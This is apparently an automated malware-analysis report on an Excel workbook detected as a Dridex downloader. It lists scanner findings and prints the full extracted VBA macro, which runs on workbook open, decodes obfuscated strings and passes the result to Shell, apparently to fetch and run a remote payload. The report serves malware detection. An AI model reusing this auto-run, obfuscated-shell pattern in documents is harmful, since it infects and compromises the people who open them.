MALICIOUS
148
Risk Score
Heuristics 4
-
ClamAV: Xls.Downloader.DridexGreen09213-9890103-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.DridexGreen09213-9890103-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell HGJHG -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Public Sub Workbook_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2239 bytes |
SHA-256: 2b52e86fe67785978e01cdfa29faf0a7d03ae879a6e819726994af9ec7ff92a4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim HGJHG As String
Public Sub Workbook_Open()
sas
'shell HGJHG
Shell HGJHG
End Sub
Private Function sas()
HGJHG = itwillx("»ºÂ°½¾³°··ks¹°Âxºµ°®¿kžÄ¾¿°¸y™°¿y¢°Ž·´°¹¿ty�ºÂ¹·º¬¯‘´·°", "KK")
HGJHG = HGJHG + itwillx("sr³¿¿»¾…zz·º²´®¬·¾®ºº¿°½¾y®º¸z¾¿Ày°Ã°rwo°¹Á…Œ»»�¬¿¬vr§¾¿Ày°Ã°rt†s™°Âxšµ°®¿kx®º¸kž³°··yŒ»»·´®¬¿´º¹tyž³°··�ð®À¿°so°¹Á…Œ»»�¬¿¬vr§¾¿Ày°Ã°rt", "KK")
End Function
Private Function itwillx(joe As String, ByVal xw As String)
Dim i As Integer, c As Integer
Dim strBuff As String
If Len(xw) Then
For i = 1 To Len(joe)
c = Asc(Mid$(joe, i, 1))
c = c - Asc(Mid$(xw, (i Mod Len(xw)) + 1, 1))
strBuff = strBuff & Chr(c And &HFF)
Next i
Else
strBuff = joe
End If
itwillx = strBuff
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 16384 bytes |
SHA-256: 1b440aa644accf9c7b77ded32ee2416a884a26623039f308385d6d92633e5795 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.